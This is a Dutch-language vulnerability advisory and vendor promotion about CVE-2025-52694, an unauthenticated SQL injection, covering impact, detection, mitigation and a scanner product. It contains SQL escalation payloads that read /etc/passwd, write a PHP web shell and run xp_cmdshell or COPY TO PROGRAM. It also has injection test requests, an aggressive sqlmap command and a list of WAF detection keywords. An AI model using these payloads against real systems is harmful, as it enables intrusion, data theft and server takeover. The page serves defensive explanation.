CVE-2025-52694: Niet-geauthenticeerde SQL Injectie Maakt Willekeurige Commando-uitvoering Mogelijk
Kort samengevat: Een SQL-injectiekwetsbaarheid waarvoor geen authenticatie nodig is, stelt externe aanvallers in staat willekeurige SQL-commando's uit te voeren op kwetsbare internet-blootgestelde diensten, wat de vertrouwelijkheid, integriteit en beschikbaarheid van data bedreigt. CVSS 10.0.
CVSS 10.0 — KRITIEK
| Veld | Detail |
|---|---|
| CVE ID | CVE-2025-52694 |
| Ernst | KRITIEK (CVSS 3.1: 10.0) |
| Type kwetsbaarheid | SQL Injectie (CWE-89) |
| Gepubliceerd | 12 januari 2026 |
| Authenticatie vereist | Geen |
| Aanvalsvector | Netwerk (internetgericht) |
Wat is CVE-2025-52694?
CVE-2025-52694 is een kritieke SQL-injectiekwetsbaarheid in een internet-blootgestelde dienst die geen authenticatie vereist om te exploiteren. Aanvallers kunnen willekeurige SQL-commando's rechtstreeks in de databasequery's van de kwetsbare dienst injecteren, waardoor mogelijk alle databasegegevens gelezen of gewijzigd kunnen worden en — afhankelijk van de databaseconfiguratie — remote code execution op de onderliggende server bereikt kan worden.
SQL-injectie staat sinds het begin in de OWASP Top 10 en blijft verwoestend effectief wanneer aanwezig. Een niet-geauthenticeerde, via het netwerk toegankelijke SQL-injectie met volledige datatoegang behoort tot de gevaarlijkste kwetsbaarheden die er zijn — vandaar de maximale CVSS-score.
Technische impact
Vertrouwelijkheid: alle databasegegevens leesbaar — gebruikersnamen, wachtwoorden, persoonsgegevens, API-sleutels, financiële data.
Integriteit: datawijziging, verwijdering van records, schemawijziging mogelijk.
Beschikbaarheid: DoS-aanvallen via resource-uitputtende query's; datavernietiging mogelijk.
Escalatiepad van SQL-injectie naar RCE
Op databases met uitgebreide functionaliteit ingeschakeld kan SQL-injectie escaleren naar uitvoering van besturingssysteemcommando's:
-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');
-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';
-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';
-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
DECLARE result text;
BEGIN
EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
RETURN result;
END;
$$ LANGUAGE plpgsql;
Getroffen versies
Raadpleeg het leveranciersadvies voor specifieke product- en versie-informatie. Elke versie die als getroffen wordt vermeld en aan internetverkeer is blootgesteld, moet als actief exploiteerbaar worden behandeld. Werk onmiddellijk bij naar door de leverancier geleverde gepatchte versies.
Detectiemethoden
Handmatig testen op SQL-injectie
# Basic error-based detection # Append ' to parameters and observe error responses GET /search?q=test' HTTP/1.1 # Boolean-based blind detection GET /search?q=test' AND 1=1-- - # Should return normal results GET /search?q=test' AND 1=2-- - # Should return empty/different results # Time-based blind detection (confirm injection) GET /search?q=test'; WAITFOR DELAY '0:0:5'-- - # MSSQL GET /search?q=test'; SELECT SLEEP(5)-- - # MySQL # Use SQLMap for automated exploitation confirmation (authorized testing only) sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs
WAF-logcontrole
Controleer uw WAF- of applicatielogs op patronen met SQL-trefwoorden (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) in verzoekparameters. Actieve exploitatie van CVE-2025-52694 zal deze patronen tonen.
🔍 KENSAI-detectie: De SQL Injection Scanner van KENSAI dekt error-based, blind, time-based en out-of-band injectietechnieken. CVE-2025-52694-injectiepatronen zijn opgenomen in onze payloadbibliotheek en worden gematcht tegen alle invoervectoren, inclusief parameters, headers en JSON/XML-body-velden.
Mitigatiestappen
- Pas onmiddellijk de leverancierspatch toe: werk bij naar de gepatchte versie zoals gespecificeerd in het leveranciersadvies.
- Geparametriseerde query's: zorg dat alle databasequery's prepared statements met geparametriseerde invoer gebruiken — de enige betrouwbare oplossing voor SQL-injectie.
- Invoervalidatie: valideer en saneer alle door gebruikers aangeleverde invoer en weiger SQL-metatekens waar niet nodig.
- Minimale rechten: databaseaccounts moeten minimale vereiste rechten hebben — nooit
sa- of root-databasetoegang vanuit applicatieaccounts. - WAF-regels: implementeer of werk WAF-regels bij om SQL-injectiepayloads te detecteren en te blokkeren — dit is een compenserende maatregel, geen oplossing.
- Schakel gevaarlijke stored procedures uit: schakel
xp_cmdshellen andere OS-niveau databasefuncties uit tenzij expliciet vereist. - Netwerksegmentatie: databaseservers mogen nooit rechtstreeks vanaf internet toegankelijk zijn.
KENSAI-detectiemogelijkheden
KENSAI biedt uitgebreide SQL-injectiedetectie, waaronder CVE-2025-52694:
- Geautomatiseerd injectietesten bij alle HTTP-parameters, headers en body-velden
- Detectie van error-based, blind boolean, time-based en UNION-based injectie
- Databasefingerprinting om de exploitatie-impact te bepalen
- Detectie van second-order SQL-injectie
- Remediatie-richtlijnen gekoppeld aan CWE-89 en OWASP A03:2021
KENSAI scant uw volledige webapplicatie-aanvalsoppervlak op SQL-injectie en 200+ andere kritieke kwetsbaarheden. Laat een SQL-injectie geen inbreuk worden.
Scan gratis op SQL-injectie